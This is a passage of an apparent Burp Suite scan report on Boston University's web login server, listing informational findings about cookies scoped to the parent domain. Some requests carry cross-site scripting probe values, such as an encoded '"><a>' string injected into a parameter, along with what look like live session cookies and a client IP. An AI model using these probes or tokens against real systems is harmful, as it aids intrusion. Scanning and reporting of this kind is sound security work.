Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; isMobile=false_1.1; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:48:03 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: up
X-UniqueID: ToyYUwrxHDsAAEIXd9Q
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:48:03 GMT
Set-Cookie: wl4cap=1317836883%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; path=/
X-BU-Main-Uniqueid: ToyYUwrxHDsAAE4ID5sAAAAF
X-BU-Duration: D=167725
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 2729

<!DOCTYPE html>
<html class="no-js">
<head>
<meta charset="UTF-8">
<title>Boston University | Web Login</title>

<!-- InstanceBegin name="header_template" -->

<link rel="stylesheet" type="t
...[SNIP]...

6.2. https://weblogin.bu.edu/accounts/bulogin-forgotaccount  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /accounts/bulogin-forgotaccount

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounts/bulogin-forgotaccount?template_extension=forgot&_last_name=xss&_email_address=xss HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 500 Internal Server Error
Date: Wed, 05 Oct 2011 17:50:12 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Content-Type: text/html; charset=iso-8859-1
X-BU-Main-Uniqueid: ToyY1ArxHDsAAFj0ixgAAABE
X-BU-Duration: D=195964
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 524

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>500 Internal Server Error</TITLE>
</HEAD><BODY>
<H1>Internal Server Error</H1>
The server encountered an internal error or
miscon
...[SNIP]...

6.3. https://weblogin.bu.edu/accounts/content/js/main.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /accounts/content/js/main.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounts/content/js/main.js HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:56 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Tue, 06 Oct 2009 20:48:07 GMT
ETag: "4e4d-421-4acbad07"
Accept-Ranges: bytes
Content-Length: 1057
Content-Type: application/x-javascript
X-BU-Main-Uniqueid: ToyYwwrxHDsAAFhwPPQAAAA1
X-BU-Duration: D=1058357
X-BU-Backend: (null) (null)
Connection: close

$(document).ready(function() {
// Edit this to make the default end date be "n" months
// ahead of whatever the user enters for the start date:
//
var DEFAULT_END_DATE_MONTHS = 1;


...[SNIP]...

6.4. https://weblogin.bu.edu/accounts/forgot  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /accounts/forgot

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounts/forgot HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://weblogin.bu.edu//web@login3?jsv=1.5p4a644%22%3E%3Ca%3E54f2c5b14d7&br=un&fl=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:55 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Expires: Tue, 04 Oct 2011 17:49:56 GMT
pragma: no-cache
cache-control: no-cache
Content-Type: text/html; charset=ISO-8859-1
X-BU-Main-Uniqueid: ToyYwwrxHDsAAFhRhSAAAAAf
X-BU-Duration: D=1537718
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 6527


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>
[1] BU Accounts | Identify Forgot
</title>
<meta http-equiv="Content-Type" content="text/html;">
<!--Fireworks M
...[SNIP]...

6.5. https://weblogin.bu.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; isMobile=false_1.1; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:48:03 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Wed, 01 Jun 2005 12:35:47 GMT
ETag: "41bd040100b7-e36-3f87a5c37eec0"
Accept-Ranges: bytes
Content-Length: 3638
X-BU-Main-Uniqueid: ToyYUwrxHDsAAE03@Z8AAAAM
X-BU-Duration: D=7732
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/plain

..............h...&... ..............(....... ...........@...........................XX..........rrr.....''........==................................................................................
...[SNIP]...

6.6. https://weblogin.bu.edu/lib/css/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /lib/css/style.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lib/css/style.css HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://weblogin.bu.edu//web@login3?jsv=1.5p&br=un&fl=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; isMobile=false_1.1; wl4cap=1317836819%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:47:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Tue, 16 Aug 2011 08:06:23 GMT
ETag: "9c68040100b7-1b0f-4aa9adb03fdc0"
Accept-Ranges: bytes
Content-Length: 6927
X-BU-Main-Uniqueid: ToyYFArxHDsAAE5mG4MAAAAQ
X-BU-Duration: D=7569
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/css

/*
   Project: BU WebLogin
   Author(s): Jon Brousseau & Tim Wright
   Created: March 2011
*/

/* RESET --------------------------------------------------------- */

html,body,div,span,object,
iframe,h1,h2,
...[SNIP]...

6.7. https://weblogin.bu.edu/lib/images/form-bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /lib/images/form-bg.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lib/images/form-bg.jpg HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu//web@login3?jsv=1.5p&br=un&fl=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; wl4cap=1317836819%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:47:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Wed, 13 Apr 2011 20:04:04 GMT
ETag: "9c6a040100b7-13f-4a0d24f7cd500"
Accept-Ranges: bytes
Content-Length: 319
X-BU-Main-Uniqueid: ToyYFArxHDsAAE5lGRkAAAAP
X-BU-Duration: D=7668
X-BU-Backend: (null) (null)
Connection: close
Content-Type: image/jpeg

......Exif..II*.................Ducky.......<......Adobe.d....................    ...    .......

.

.......................................................................................................
...[SNIP]...

6.8. https://weblogin.bu.edu/lib/images/subsig-large.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /lib/images/subsig-large.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lib/images/subsig-large.gif HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu//web@login3?jsv=1.5p&br=un&fl=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; wl4cap=1317836819%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:47:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Wed, 13 Apr 2011 20:04:04 GMT
ETag: "9c6b040100b7-4dd-4a0d24f7cd500"
Accept-Ranges: bytes
Content-Length: 1245
X-BU-Main-Uniqueid: ToyYFArxHDsAAE4ID3cAAAAF
X-BU-Duration: D=7457
X-BU-Backend: (null) (null)
Connection: close
Content-Type: image/gif

GIF89a..#..*....@@@.........000......```.DDPPP... .ff...ppp.......ww.........."".UU.33................................................................................................................
...[SNIP]...

6.9. https://weblogin.bu.edu/lib/scripts/BUweblogin.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /lib/scripts/BUweblogin.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lib/scripts/BUweblogin.js HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu//web@login3?jsv=1.5p&br=un&fl=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; isMobile=false_1.1; wl4cap=1317836819%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:47:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Mon, 01 Aug 2011 19:37:10 GMT
ETag: "9c6c040100b7-aba-4a976c1d46580"
Accept-Ranges: bytes
Content-Length: 2746
X-BU-Main-Uniqueid: ToyYFArxHDsAAE5UEuAAAAAH
X-BU-Duration: D=7839
X-BU-Backend: (null) (null)
Connection: close
Content-Type: application/x-javascript

var IE4 = document.all;
var NS4 = document.layers;
function enter_key_trap (e) {
var keyPressed;
if (NS4)
keyPressed = String.fromCharCode(e.which);
else if (IE4)
keyPressed = String.fro
...[SNIP]...

6.10. https://weblogin.bu.edu/web@login3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web@login3?jsv=1.5p4a644%22%3E%3Ca%3E54f2c5b14d7&br=un&fl=0 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:54 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: up
X-UniqueID: ToyYwgrxHDsAAFl@RhA
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:49:54 GMT
Set-Cookie: wl4cap=1317836995%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; path=/
X-BU-Main-Uniqueid: ToyYwgrxHDsAAFiBZSsAAABF
X-BU-Duration: D=910450
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 2758

<!DOCTYPE html>
<html class="no-js">
<head>
<meta charset="UTF-8">
<title>Boston University | Web Login</title>

<!-- InstanceBegin name="header_template" -->

<link rel="stylesheet" type="t
...[SNIP]...

6.11. https://weblogin.bu.edu/web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bu.edu/directory/change-entry.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); isMobile=false_1.2; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:48:01 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: CHECK-SHORTEN(length) https://127.0.0.1//web@login3
X-UniqueID: ToyYUQrxHDsAAEIXd9A
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:48:01 GMT
X-BU-Main-Uniqueid: ToyYUQrxHDsAAFC0OSgAAAAR
X-BU-Duration: D=101903
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 5622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Weblogin Browser Check</title>
<!-- BUTag(check) -->
<script LANGUAGE=
...[SNIP]...

6.12. https://weblogin.bu.edu/web@login3/1317837446/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837446.11881  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317837446/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837446.11881

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web@login3/1317837446/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837446.11881 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ezproxy.bu.edu/login
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:59:24 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: CHECK-SHORTEN(length) https://127.0.0.1//web@login3
X-UniqueID: Toya-ArxHDsAAFvabkM
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:59:24 GMT
X-BU-Main-Uniqueid: Toya-ArxHDsAAFIjVuMAAAAP
X-BU-Duration: D=24167271
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 5622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Weblogin Browser Check</title>
<!-- BUTag(check) -->
<script LANGUAGE=
...[SNIP]...

6.13. https://weblogin.bu.edu/web@login3/1317837562/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4  previous  next

Summary

